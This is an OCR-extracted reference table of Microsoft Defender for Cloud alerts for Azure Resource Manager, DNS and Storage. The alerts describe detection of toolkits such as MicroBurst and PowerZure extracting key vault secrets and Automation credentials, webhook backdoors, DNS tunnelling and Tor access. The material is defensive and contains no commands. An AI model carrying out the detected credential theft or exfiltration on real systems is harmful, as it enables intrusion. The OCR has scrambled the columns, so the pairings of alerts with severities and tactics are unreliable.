was detected by analyzing Azure Resource 

Manager operations in your subscription. 


Severity 


Medium 


Low 


Low 


High 


High 


Alert (alert type) 


MicroBurst exploitation toolkit used to extract keys 
from your Azure key vaults 
(ARM_MicroBurst.AzKeyVaultKeysREST) 


MicroBurst exploitation toolkit used to extract keys 
to your storage accounts 
(ARM_MicroBurst.AZStorageKeysREST) 


MicroBurst exploitation toolkit used to extract 
secrets from your Azure key vaults 
(ARM_MicroBurst.AzKeyVaultSecretsREST) 


PowerZure exploitation toolkit used to elevate 
access from Azure AD to Azure 
(ARM_PowerZure.AzureElevatedPrivileges) 


PowerZure exploitation toolkit used to enumerate 
resources 
(ARM_PowerZure.GetAzure Targets) 


PowerZure exploitation toolkit used to enumerate 
storage containers, shares, and tables 
(ARM_PowerZure.ShowStorageContent) 


MITRE 
tactics 


Description 


(Learn 
more) 


A PowerShell script was run in your - 
subscription and performed a suspicious 
pattern of extracting keys from an Azure Key 
Vault(s). Threat actors use automated scripts, 
like MicroBurst, to list keys and use them to 
access sensitive data or perform lateral 
movement. This was detected by analyzing 
Azure Resource Manager operations in your 
subscription. This operation might indicate that 
an identity in your organization was breached, 
and that the threat actor is trying to 
compromise your environment for malicious 
intentions. 


A PowerShell script was run in your Collection 
subscription and performed a suspicious 
pattern of extracting keys to Storage 
Account(s). Threat actors use automated 
scripts, like MicroBurst, to list keys and use 
them to access sensitive data in your Storage 
Account(s). This was detected by analyzing 
Azure Resource Manager operations in your 
subscription. This operation might indicate that 
an identity in your organization was breached, 
and that the threat actor is trying to 
compromise your environment for malicious 
intentions. 


A PowerShell script was run in your - 
subscription and performed a suspicious 
pattern of extracting secrets from an Azure Key 
Vault(s). Threat actors use automated scripts, 
like MicroBurst, to list secrets and use them to 
access sensitive data or perform lateral 
movement. This was detected by analyzing 
Azure Resource Manager operations in your 
subscription. This operation might indicate that 
an identity in your organization was breached, 
and that the threat actor is trying to 
compromise your environment for malicious 
intentions. 


PowerZure exploitation toolkit was used to - 
elevate access from AzureAD to Azure. This 

was detected by analyzing Azure Resource 

Manager operations in your tenant. 


PowerZure exploitation toolkit was used to Collection 
enumerate resources on behalf of a legitimate 

user account in your organization. This was 

detected by analyzing Azure Resource 


Manager operations in your subscription. 


PowerZure exploitation toolkit was used to - 
enumerate storage shares, tables, and 

containers. This was detected by analyzing 

Azure Resource Manager operations in your 
subscription. 


Severity 


High 


High 


High 


High 


High 


High 


Alert (alert type) 


PowerZure exploitation toolkit used to execute a 
Runbook in your subscription 
(ARM_PowerZure.StartRunbook) 


PowerZure exploitation toolkit used to extract 
Runbooks content 
(ARM_PowerZure.AzureRunbookContent) 


PREVIEW - Azurite toolkit run detected 
(ARM_Azurite) 


PREVIEW - Suspicious creation of compute resources 
detected 
(ARM_SuspiciousComputeCreation) 


PREVIEW - Suspicious key vault recovery detected 
(Arm_Suspicious_Vault_Recovering) 


PREVIEW - Suspicious management session using an 
inactive account detected 
(ARM_UnusedAccountPersistence) 


MITRE 
tactics 


Description 


(Learn 
more) 


PowerZure exploitation toolkit was used to - 
execute a Runbook. This was detected by 

analyzing Azure Resource Manager operations 

in your subscription. 


PowerZure exploitation toolkit was used to Collection 
extract Runbook content. This was detected by 
analyzing Azure Resource Manager operations 


in your subscription. 


A known cloud-environment reconnaissance Collection 
toolkit run has been detected in your 

environment. The tool Azurite “ can be used 

by an attacker (or penetration tester) to map 

your subscriptions’ resources and identify 


insecure configurations. 


Microsoft Defender for Resource Manager Impact 
identified a suspicious creation of compute 
resources in your subscription utilizing Virtual 
Machines/Azure Scale Set. The identified 
operations are designed to allow 
administrators to efficiently manage their 
environments by deploying new resources 
when needed. While this activity may be 
legitimate, a threat actor might utilize such 
operations to conduct crypto mining. 

The activity is deemed suspicious as the 
compute resources scale is higher than 
previously observed in the subscription. 

This can indicate that the principal is 
compromised and is being used with malicious 
intent. 


Microsoft Defender for Resource Manager Lateral 


detected a suspicious recovery operation fora movement 
soft-deleted key vault resource. 

The user recovering the resource is different 
from the user that deleted it. This is highly 
suspicious because the user rarely invokes such 
an operation. In addition, the user logged on 
without multi-factor authentication (MFA). 

This might indicate that the user is 
compromised and is attempting to discover 
secrets and keys to gain access to sensitive 
resources, or to perform lateral movement 
across your network. 


Subscription activity logs analysis has detected Persistence 
suspicious behavior. A principal not in use for a 
long period of time is now performing actions 


that can secure persistence for an attacker. 


Severity 


High 


High 


High 


Medium 


Medium/high 


Medium 


Alert (alert type) 


PREVIEW - Suspicious invocation of a high-risk 
‘Credential Access' operation by a service principal 
detected 
(ARM_AnomalousServiceOperation.CredentialAccess) 


PREVIEW - Suspicious invocation of a high-risk Data 
Collection’ operation by a service principal detected 
(ARM_AnomalousServiceOperation.Collection) 


PREVIEW - Suspicious invocation of a high-risk 
‘Defense Evasion’ operation by a service principal 
detected 
(ARM_AnomalousServiceOperation.DefenseEvasion) 


PREVIEW - Suspicious invocation of a high-risk 
‘Execution’ operation by a service principal detected 
(ARM_AnomalousServiceOperation.Execution) 


MITRE 
tactics 


Description 


(Learn 
more) 


Microsoft Defender for Resource Manager Credential 


identified a suspicious invocation of a high-risk access 
operation in your subscription which might 

indicate an attempt to access credentials. The 

identified operations are designed to allow 

administrators to efficiently manage their 


environments. While this activity may be 


egitimate, a threat actor might utilize such 
operations to access restricted credentials and 
compromise resources in your environment. 
This can indicate that the service principal is 
compromised and is being used with malicious 
intent. 


Microsoft Defender for Resource Manager Collection 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to collect data. The 
identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 
egitimate, a threat actor might utilize such 
operations to collect sensitive data on 
resources in your environment. This can 
indicate that the service principal is 
compromised and is being used with malicious 
intent. 


Microsoft Defender for Resource Manager Defense 


identified a suspicious invocation of a high-risk Evasion 
operation in your subscription which might 


indicate an attempt to evade defenses. The 


identified operations are designed to allow 
administrators to efficiently manage the 
security posture of their environments. While 
this activity may be legitimate, a threat actor 
might utilize such operations to avoid being 
detected while compromising resources in 
your environment. This can indicate that the 
service principal is compromised and is being 
used with malicious intent. 


Microsoft Defender for Resource Manager Defense 


identified a suspicious invocation of a high-risk Execution 
operation on a machine in your subscription 
which might indicate an attempt to execute 
code. The identified operations are designed 
to allow administrators to efficiently manage 
their environments. While this activity may be 
legitimate, a threat actor might utilize such 
operations to access restricted credentials and 
compromise resources in your environment. 
This can indicate that the service principal is 
compromised and is being used with malicious 


intent. 


Severity 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


PREVIEW - Suspicious invocation of a high-risk 
‘Impact’ operation by a service principal detected 
(ARM_AnomalousServiceOperation.Impact) 


PREVIEW - Suspicious invocation of a high-risk 
‘Initial Access' operation by a service principal 
detected 
(ARM_AnomalousServiceOperation.|InitialAccess) 


PREVIEW - Suspicious invocation of a high-risk 
‘Lateral Movement Access’ operation by a service 
principal detected 
(ARM_AnomalousServiceOperation.LateralMovement) 


PREVIEW - Suspicious invocation of a high-risk 
‘persistence’ operation by a service principal 
detected 
(ARM_AnomalousServiceOperation.Persistence) 


Description 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempted configuration change. 
The identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 
legitimate, a threat actor might utilize such 
operations to access restricted credentials and 
compromise resources in your environment. 
This can indicate that the service principal is 
compromised and is being used with malicious 
intent. 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to access restricted 
resources. The identified operations are 
designed to allow administrators to efficiently 
access their environments. While this activity 
may be legitimate, a threat actor might utilize 
such operations to gain initial access to 
restricted resources in your environment. This 
can indicate that the service principal is 
compromised and is being used with malicious 
intent. 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to perform lateral 
movement. The identified operations are 
designed to allow administrators to efficiently 
manage their environments. While this activity 
may be legitimate, a threat actor might utilize 
such operations to compromise more 
resources in your environment. This can 
indicate that the service principal is 
compromised and is being used with malicious 
intent. 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 


indicate an attempt to establish persistence. 
The identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 
legitimate, a threat actor might utilize such 
operations to establish persistence in your 
environment. This can indicate that the service 
principal is compromised and is being used 
with malicious intent. 


MITRE 
tactics 
(Learn 
more) 


Impact 


Initial 
access 


Lateral 
movement 


Persistence 


Severity 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


PREVIEW - Suspicious invocation of a high-risk 


‘Privilege Escalation’ operation by a service principal 


detected 


(ARM_AnomalousServiceOperation.PrivilegeEscalation) 


PREVIEW - Suspicious management session using an 


inactive account detected 
(ARM_UnusedAccountPersistence) 


PREVIEW - Suspicious management session using 


PowerShell detected 
(ARM_UnusedAppPowershellPersistence) 


PREVIEW — Suspicious management session using 


Azure portal detected 
(ARM_UnusedApplbizaPersistence) 


Privileged custom role created for your subscription 


in a suspicious way (Preview) 
(ARM_PrivilegedRoleDefinitionCreation) 


Suspicious Azure role assignment detected (Preview) 


(ARM_AnomalousRBACRoleAssignment) 


Description 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to escalate privileges. The 
identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 


egitimate, a threat actor might utilize such 
operations to escalate privileges while 
compromising resources in your environment. 
This can indicate that the service principal is 
compromised and is being used with malicious 
intent. 


Subscription activity logs analysis has detected 
suspicious behavior. A principal not in use for a 
long period of time is now performing actions 

that can secure persistence for an attacker. 


Subscription activity logs analysis has detected 
suspicious behavior. A principal that doesn't 
regularly use PowerShell to manage the 
subscription environment is now using 
PowerShell, and performing actions that can 
secure persistence for an attacker. 


Analysis of your subscription activity logs has 
detected a suspicious behavior. A principal that 
doesn't regularly use the Azure portal (Ibiza) to 
manage the subscription environment (hasn't 
used Azure portal to manage for the last 45 
days, or a subscription that it is actively 
managing), is now using the Azure portal and 
performing actions that can secure persistence 
for an attacker. 


Microsoft Defender for Resource Manager 
detected a suspicious creation of privileged 
custom role definition in your subscription. 
This operation might have been performed by 
a legitimate user in your organization. 
Alternatively, it might indicate that an account 
in your organization was breached, and that 
the threat actor is trying to create a privileged 
role to use in the future to evade detection. 


Microsoft Defender for Resource Manager 
identified a suspicious Azure role assignment / 
performed using PIM (Privileged Identity 
Management) in your tenant which might 
indicate that an account in your organization 
was compromised. The identified operations 
are designed to allow administrators to grant 
principals access to Azure resources. While this 
activity may be legitimate, a threat actor might 
utilize role assignment to escalate their 
permissions allowing them to advance their 
attack. 


MITRE 
tactics 
(Learn 
more) 


Privilege 
escalation 


Persistence 


Persistence 


Persistence 


Privilege 
Escalation, 
Defense 
Evasion 


Lateral 
Movement, 
Defense 
Evasion 


Severity 


Medium 


Medium 


Medium 


Medium 


Low 


Low (PIM) / 
High 


Alert (alert type) 


Suspicious invocation of a high-risk ‘Credential 
Access' operation detected (Preview) 
(ARM_AnomalousOperation.CredentialAccess) 


Suspicious invocation of a high-risk ‘Data Collection’ 
operation detected (Preview) 
(ARM_AnomalousOperation.Collection) 


Suspicious invocation of a high-risk 'Defense 
Evasion’ operation detected (Preview) 
(ARM_AnomalousOperation.DefenseEvasion) 


Suspicious invocation of a high-risk ‘Execution’ 
operation detected (Preview) 
(ARM_AnomalousOperation.Execution) 


Description 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to access credentials. The 
identified operations are designed to allow 
administrators to efficiently access their 
environments. While this activity may be 


egitimate, a threat actor might utilize such 
operations to access restricted credentials and 
compromise resources in your environment. 
This can indicate that the account is 
compromised and is being used with malicious 
intent. 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to collect data. The 
identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 
egitimate, a threat actor might utilize such 
operations to collect sensitive data on 
resources in your environment. This can 


indicate that the account is compromised and 
is being used with malicious intent. 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to evade defenses. The 


identified operations are designed to allow 
administrators to efficiently manage the 
security posture of their environments. While 
this activity may be legitimate, a threat actor 
might utilize such operations to avoid being 
detected while compromising resources in 
your environment. This can indicate that the 
account is compromised and is being used 
with malicious intent. 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation on a machine in your subscription 
which might indicate an attempt to execute 
code. The identified operations are designed 
to allow administrators to efficiently manage 
their environments. While this activity may be 
legitimate, a threat actor might utilize such 
operations to access restricted credentials and 
compromise resources in your environment. 
This can indicate that the account is 


compromised and is being used with malicious 
intent. 


MITRE 
tactics 
(Learn 
more) 


Credential 
Access 


Collection 


Defense 
Evasion 


Execution 


Severity 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


Suspicious invocation of a high-risk ‘Impact 
operation detected (Preview) 
(ARM_AnomalousOperation.Impact) 


Suspicious invocation of a high-risk ‘Initial Access’ 
operation detected (Preview) 
(ARM_AnomalousOperation.I|nitialAccess) 


Suspicious invocation of a high-risk ‘Lateral 
Movement' operation detected (Preview) 
(ARM_AnomalousOperation.LateralMovement) 


Suspicious invocation of a high-risk ‘Persistence 
operation detected (Preview) 
(ARM_AnomalousOperation.Persistence) 


MITRE 
tactics 


Description 


(Learn 
more) 


Microsoft Defender for Resource Manager Impact 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempted configuration change. 
The identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 
legitimate, a threat actor might utilize such 
operations to access restricted credentials and 
compromise resources in your environment. 
This can indicate that the account is 
compromised and is being used with malicious 
intent. 

Microsoft Defender for Resource Manager Initial 
identified a suspicious invocation of a high-risk Access 
operation in your subscription which might 

indicate an attempt to access restricted 

resources. The identified operations are 

designed to allow administrators to efficiently 

access their environments. While this activity 

may be legitimate, a threat actor might utilize 

such operations to gain initial access to 

restricted resources in your environment. This 

can indicate that the account is compromised 

and is being used with malicious intent. 


Microsoft Defender for Resource Manager Lateral 


identified a suspicious invocation of a high-risk © Movement 
operation in your subscription which might 
indicate an attempt to perform lateral 
movement. The identified operations are 
designed to allow administrators to efficiently 
manage their environments. While this activity 
may be legitimate, a threat actor might utilize 
such operations to compromise more 
resources in your environment. This can 
indicate that the account is compromised and 
is being used with malicious intent. 


Microsoft Defender for Resource Manager Persistence 
identified a suspicious invocation of a high-risk 


operation in your subscription which might 


indicate an attempt to establish persistence. 
The identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 
legitimate, a threat actor might utilize such 
operations to establish persistence in your 
environment. This can indicate that the 
account is compromised and is being used 
with malicious intent. 


Severity 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


Suspicious invocation of a high-risk ‘Privilege 
Escalation’ operation detected (Preview) 
(ARM_AnomalousOperation.PrivilegeEscalation) 


Usage of MicroBurst exploitation toolkit to run an 
arbitrary code or exfiltrate Azure Automation 
account credentials 
(ARM_MicroBurst.RunCodeOnBehalf) 


Usage of NetSPI techniques to maintain persistence 
in your Azure environment 
(ARM_NetSPI.MaintainPersistence) 


Usage of PowerZure exploitation toolkit to run an 
arbitrary code or exfiltrate Azure Automation 
account credentials 
(ARM_PowerZure.RunCodeOnBehalf) 


Usage of PowerZure function to maintain persistence 
in your Azure environment 
(ARM_PowerZure.MaintainPersistence) 


Suspicious classic role assignment detected 
(Preview) 
(ARM_AnomalousClassicRoleAssignment) 


Alerts for DNS 


Description 


Microsoft Defender for Resource Manager 
identified a suspicious invocation of a high-risk 
operation in your subscription which might 
indicate an attempt to escalate privileges. The 
identified operations are designed to allow 
administrators to efficiently manage their 
environments. While this activity may be 


egitimate, a threat actor might utilize such 
operations to escalate privileges while 
compromising resources in your environment. 
This can indicate that the account is 
compromised and is being used with malicious 
intent. 


A PowerShell script was run in your 
subscription and performed a suspicious 
pattern of executing an arbitrary code or 
exfiltrate Azure Automation account 
credentials. Threat actors use automated 
scripts, like MicroBurst, to run arbitrary code 
for malicious activities. This was detected by 
analyzing Azure Resource Manager operations 
in your subscription. This operation might 
indicate that an identity in your organization 
was breached, and that the threat actor is 
trying to compromise your environment for 
malicious intentions. 


Usage of NetSPI persistence technique to 
create a webhook backdoor and maintain 
persistence in your Azure environment. This 
was detected by analyzing Azure Resource 
Manager operations in your subscription. 


PowerZure exploitation toolkit detected 
attempting to run code or exfiltrate Azure 
Automation account credentials. This was 
detected by analyzing Azure Resource 
Manager operations in your subscription. 


PowerZure exploitation toolkit detected 
creating a webhook backdoor to maintain 
persistence in your Azure environment. This 
was detected by analyzing Azure Resource 
Manager operations in your subscription. 


Microsoft Defender for Resource Manager 
identified a suspicious classic role assignment 
in your tenant which might indicate that an 
account in your organization was 
compromised. The identified operations are 
designed to provide backward compatibility 
with classic roles that are no longer commonly 
used. While this activity may be legitimate, a 
threat actor might utilize such assignment to 
grant permissions to another user account 


under their control. 


MITRE 
tactics 
(Learn 
more) 


Privilege 
Escalation 


Persistence, 
Credential 
Access 


Lateral 
Movement, 
Defense 
Evasion 


Severity 


Medium 


High 


High 


High 


High 


High 


Further details and notes 


Alert (alert type) 


Anomalous network protocol usage 
(AzureDNS_ProtocolAnomaly) 


Anonymity network activity 
(AzureDNS_DarkWeb) 


Anonymity network activity using web 


proxy 
(AzureDNS_DarkWebProxy) 


Attempted communication with 
suspicious sinkholed domain 
(AzureDNS_SinkholedDomain) 


Communication with possible phishing 
domain 
(AzureDNS_PhishingDomain) 


Communication with suspicious 
algorithmically generated domain 
(AzureDNS_DomainGenerationAlgorithm) 


Communication with suspicious domain 
identified by threat intelligence 
(AzureDNS ThreatintelSuspectDomain) 


Communication with suspicious random 
domain name 
(AzureDNS_RandomizedDomain) 


Description 


Analysis of DNS transactions from %{CompromisedEntity} 
detected anomalous protocol usage. Such traffic, while possibly 
benign, may indicate abuse of this common protocol to bypass 
network traffic filtering. Typical related attacker activity includes 
copying remote administration tools to a compromised host and 
exfiltrating user data from it. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected anonymity network activity. Such activity, while possibly 
legitimate user behavior, is frequently employed by attackers to 
evade tracking and fingerprinting of network communications. 
Typical related attacker activity is likely to include the download 
and execution of malicious software or remote administration 
tools. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected anonymity network activity. Such activity, while possibly 
legitimate user behavior, is frequently employed by attackers to 
evade tracking and fingerprinting of network communications. 
Typical related attacker activity is likely to include the download 
and execution of malicious software or remote administration 
tools. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected request for sinkholed domain. Such activity, while 
possibly legitimate user behavior, is frequently an indication of 
the download or execution of malicious software. Typical related 
attacker activity is likely to include the download and execution of 
further malicious software or remote administration tools. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected a request for a possible phishing domain. Such activity, 
while possibly benign, is frequently performed by attackers to 
harvest credentials to remote services. Typical related attacker 
activity is likely to include the exploitation of any credentials on 
the legitimate service. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected possible usage of a domain generation algorithm. Such 
activity, while possibly benign, is frequently performed by 
attackers to evade network monitoring and filtering. Typical 
related attacker activity is likely to include the download and 
execution of malicious software or remote administration tools. 


Communication with suspicious domain was detected by 
analyzing DNS transactions from your resource and comparing 
against known malicious domains identified by threat intelligence 
feeds. Communication to malicious domains is frequently 
performed by attackers and could imply that your resource is 
compromised. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected usage of a suspicious randomly generated domain 
name. Such activity, while possibly benign, is frequently 
performed by attackers to evade network monitoring and 
filtering. Typical related attacker activity is likely to include the 
download and execution of malicious software or remote 
administration tools. 


MITRE 
tactics 
(Learn 
more) 


Exfiltration 


Exfiltration 


Exfiltration 


Exfiltration 


Exfiltration 


Exfiltration 


Initial 
Access 


Exfiltration 


Severity 


Medium 


Alert (alert type) 


Digital currency mining activity 
(AzureDNS_CurrencyMining) 


Network intrusion detection signature 
activation 
(AzureDNS _SuspiciousDomain) 


Possible data download via DNS tunnel 
(AzureDNS_Datalnfiltration) 


Possible data exfiltration via DNS tunnel 
(AzureDNS_DataExfiltration) 


Possible data transfer via DNS tunnel 
(AzureDNS_DataObfuscation) 


Description 


Analysis of DNS transactions from %{CompromisedEntity} 
detected digital currency mining activity. Such activity, while 
possibly legitimate user behavior, is frequently performed by 
attackers following compromise of resources. Typical related 
attacker activity is likely to include the download and execution of 
common mining tools. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected a known malicious network signature. Such activity, 
while possibly legitimate user behavior, is frequently an indication 
of the download or execution of malicious software. Typical 
related attacker activity is likely to include the download and 
execution of further malicious software or remote administration 
tools. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected a possible DNS tunnel. Such activity, while possibly 
legitimate user behavior, is frequently performed by attackers to 
evade network monitoring and filtering. Typical related attacker 
activity is likely to include the download and execution of 
malicious software or remote administration tools. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected a possible DNS tunnel. Such activity, while possibly 
legitimate user behavior, is frequently performed by attackers to 
evade network monitoring and filtering. Typical related attacker 
activity is likely to include the download and execution of 
malicious software or remote administration tools. 


Analysis of DNS transactions from %{CompromisedEntity} 
detected a possible DNS tunnel. Such activity, while possibly 
legitimate user behavior, is frequently performed by attackers to 
evade network monitoring and filtering. Typical related attacker 
activity is likely to include the download and execution of 
malicious software or remote administration tools. 


Alerts for Azure Storage 


Further details and notes 


Alert (alert type) 


Description 


MITRE tactics 
(Learn more) 


MITRE 
tactics 


Severity 


(Learn 
more) 


Exfiltration a 


Exfiltration - 


Exfiltration - 


Exfiltration - 


Exfiltration - 


Severity 


Alert (alert type) 


Access from a suspicious application 
(Storage.Blob_SuspiciousApp) 


Access from a suspicious IP address 
(Storage.Blob_Suspiciouslp 
Storage.Files_Suspiciouslp) 


Phishing content hosted on a storage account 


(Storage.Blob_PhishingContent 
Storage.Files_PhishingContent) 


Description MITRE tactics 


(Learn more) 


Indicates that a suspicious Initial Access 
application has 
successfully accessed a 
container of a storage 
account with 
authentication. 

This might indicate that an 
attacker has obtained the 
credentials necessary to 
access the account, and is 
exploiting it. This could 
also be an indication of a 
penetration test carried 
out in your organization. 
Applies to: Azure Blob 
Storage, Azure Data Lake 
Storage Gen2 


Indicates that this storage Pre Attack 
account has been 
successfully accessed from 
an IP address that is 
considered suspicious. 
This alert is powered by 
Microsoft Threat 
Intelligence. 

Learn more about 
Microsoft's threat 
intelligence capabilities £. 


Applies to: Azure Blob 
Storage, Azure Files, Azure 
Data Lake Storage Gen2 


A URL used in a phishing Collection 
attack points to your 
Azure Storage account. 
This URL was part of a 
phishing attack affecting 
users of Microsoft 365. 
Typically, content hosted 
on such pages is designed 
to trick visitors into 
entering their corporate 
credentials or financial 
information into a web 
form that looks legitimate. 
This alert is powered by 
Microsoft Threat 
Intelligence. 

Learn more about 
Microsoft's threat 
intelligence capabilities £. 
Applies to: Azure Blob 
Storage, Azure Files 


Severity 


High/Medium 


High/Medium/Low 


High 


Alert (alert type) Description MITRE tactics Severity 
(Learn more) 


Storage account identified as source for distribution of Antimalware alerts Execution Medium 
malware indicate that an infected 
(Storage.Files_WidespreadeAm) file(s) is stored in an Azure 


file share that is mounted 
to multiple VMs. If 
attackers gain access to a 
VM with a mounted Azure 
file share, they can use it 
to spread malware to 
other VMs that mount the 
same share. 

Applies to: Azure Files 


The access level of a potentially sensitive storage blob The alert indicates that Collection Medium 
container was changed to allow unauthenticated public someone has changed the 

access access level of a blob 

(Storage.Blob_OpenACL) container in the storage 


account, which may 
contain sensitive data, to 
the 'Container' level, to 
allow unauthenticated 
(anonymous) public 
access. The change was 
made through the Azure 
portal. 
Based on statistical 
analysis, the blob 
container is flagged as 
possibly containing 
sensitive data. This 
analysis suggests that blob 


containers or storage 
accounts with similar 
names are typically not 
exposed to public access. 
Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2, or premium 
block blobs) storage 


accounts. 
Authenticated access from a Tor exit node One or more storage Initial Access / High/Medium 
(Storage.Blob_TorAnomaly container(s) / file share(s) Pre Attack 
Storage.Files_TorAnomaly) in your storage account 


were successfully accessed 
from an IP address known 
to be an active exit node 
of Tor (an anonymizing 
proxy). Threat actors use 
Tor to make it difficult to 
trace the activity back to 
them. Authenticated 
access from a Tor exit 
node is a likely indication 
that a threat actor is trying 
to hide their identity. 
Applies to: Azure Blob 
Storage, Azure Files, Azure 
Data Lake Storage Gen2 


Alert (alert type) 


Access from an unusual location to a storage account 


(Storage.Blob_GeoAnomaly 
Storage.Files_GeoAnomaly) 


Unusual unauthenticated access to a storage container 


(Storage.Blob_AnonymousAccessAnomaly) 


Description MITRE tactics 
(Learn more) 


Indicates that there was a Initial Access 
change in the access 
pattern to an Azure 
Storage account. Someone 
has accessed this account 
from an IP address 
considered unfamiliar 
when compared with 
recent activity. Either an 
attacker has gained access 
to the account, ora 
legitimate user has 
connected from a new or 
unusual geographic 
location. An example of 
the latter is remote 
maintenance from a new 
application or developer. 
Applies to: Azure Blob 
Storage, Azure Files, Azure 
Data Lake Storage Gen2 


This storage account was Initial Access 
accessed without 
authentication, which is a 
change in the common 
access pattern. Read 
access to this container is 
usually authenticated. This 
might indicate that a 
threat actor was able to 
exploit public read access 
to storage container(s) in 
this storage account(s). 
Applies to: Azure Blob 
Storage 


Severity 


High/Medium/Low 


High/Low 


Alert (alert type) 


Potential malware uploaded to a storage account 


(Storage.Blob_MalwareHashReputation 
Storage.Files_MalwareHashReputation) 


Publicly accessible storage containers successfully discovered 
(Storage.Blob_OpenContainersScanning.SuccessfulDiscovery) 


Description MITRE tactics 


(Learn more) 


Indicates that a blob Lateral 
containing potential Movement 
malware has been 
uploaded to a blob 
container or a file share in 
a storage account. This 
alert is based on hash 
reputation analysis 
leveraging the power of 
Microsoft threat 
intelligence, which 
includes hashes for 
viruses, trojans, spyware 
and ransomware. Potential 
causes may include an 
intentional malware 
upload by an attacker, or 
an unintentional upload of 
a potentially malicious 
blob by a legitimate user. 
Applies to: Azure Blob 
Storage, Azure Files (Only 
for transactions over REST 
API) 

Learn more about 
Microsoft's threat 
intelligence capabilities £. 


A successful discovery of Collection 
publicly open storage 

container(s) in your 

storage account was 

performed in the last hour 

by a scanning script or 

tool. 


This usually indicates a 
reconnaissance attack, 
where the threat actor 
tries to list blobs by 
guessing container names, 
in the hope of finding 
misconfigured open 
storage containers with 
sensitive data in them. 


The threat actor may use 
their own script or use 
known scanning tools like 
Microburst to scan for 
publicly open containers. 


vV Azure Blob Storage 
X Azure Files 

X Azure Data Lake 
Storage Gen2 


Severity 


High 


High/Medium 


Alert (alert type) 


Publicly accessible storage containers unsuccessfully scanned 


(Storage.Blob_OpenContainersScanning.FailedAttempt) 


Unusual access inspection in a storage account 
(Storage.Blob_AccessInspectionAnomaly 
Storage.Files_AccessInspectionAnomaly) 


Unusual amount of data extracted from a storage account 
(Storage.Blob_DataExfiltration.AmountOfDataAnomaly 
Storage.Blob_DataExfiltration.NumberOfBlobsAnomaly 
Storage.Files_DataExfiltration AmountOfDataAnomaly 
Storage.Files_DataExfiltration. NumberOfFilesAnomaly) 


Unusual application accessed a storage account 
(Storage.Blob_ApplicationAnomaly 
Storage.Files_ApplicationAnomaly) 


Description 


A series of failed attempts 
to scan for publicly open 
storage containers were 
performed in the last hour. 


This usually indicates a 
reconnaissance attack, 
where the threat actor 
tries to list blobs by 
guessing container names, 
in the hope of finding 
misconfigured open 
storage containers with 
sensitive data in them. 


The threat actor may use 
their own script or use 
known scanning tools like 
Microburst to scan for 
publicly open containers. 


V Azure Blob Storage 
X Azure Files 

X Azure Data Lake 
Storage Gen2 


Indicates that the access 
permissions of a storage 
account have been 
inspected in an unusual 
way, compared to recent 
activity on this account. A 
potential cause is that an 
attacker has performed 
reconnaissance for a 
future attack. 

Applies to: Azure Blob 
Storage, Azure Files 


Indicates that an unusually 
large amount of data has 
been extracted compared 
to recent activity on this 
storage container. A 
potential cause is that an 
attacker has extracted a 
large amount of data from 
a container that holds 
blob storage. 

Applies to: Azure Blob 
Storage, Azure Files, Azure 
Data Lake Storage Gen2 


Indicates that an unusual 
application has accessed 
this storage account. A 
potential cause is that an 
attacker has accessed your 
storage account by using 
a new application. 

Applies to: Azure Blob 
Storage, Azure Files 


MITRE tactics 
(Learn more) 


Collection 


Discovery 


Exfiltration 


Execution 


Severity 


High/Low 


High/Medium 


High/Low 


High/Medium 


Alert (alert type) 


Unusual data exploration in a storage account 


(Storage.Blob_DataExplorationAnomaly 
Storage.Files_DataExplorationAnomaly) 


Unusual deletion in a storage account 
(Storage.Blob_DeletionAnomaly 
Storage.Files_DeletionAnomaly) 


Description MITRE tactics 


(Learn more) 


Indicates that blobs or Execution 
containers in a storage 
account have been 
enumerated in an 
abnormal way, compared 
to recent activity on this 
account. A potential cause 
is that an attacker has 
performed reconnaissance 
for a future attack. 
Applies to: Azure Blob 
Storage, Azure Files 


Indicates that one or more Exfiltration 
unexpected delete 
operations has occurred in 
a storage account, 
compared to recent 
activity on this account. A 
potential cause is that an 
attacker has deleted data 
from your storage 
account. 

Applies to: Azure Blob 
Storage, Azure Files, Azure 
Data Lake Storage Gen2 


Severity 


High/Medium 


High/Medium 


Alert (alert type) Description MITRE tactics Severity 
(Learn more) 


Unusual unauthenticated public access to a sensitive blob The alert indicates that Initial Access High 
container (Preview) someone accessed a blob 
Storage.Blob_AnonymousAccessAnomaly.Sensitive container with sensitive 


data in the storage 
account without 
authentication, using an 
external (public) IP 
address. This access is 
suspicious since the blob 
container is open to public 
access and is typically only 
accessed with 


authentication from 
internal networks (private 
IP addresses). This access 
could indicate that the 
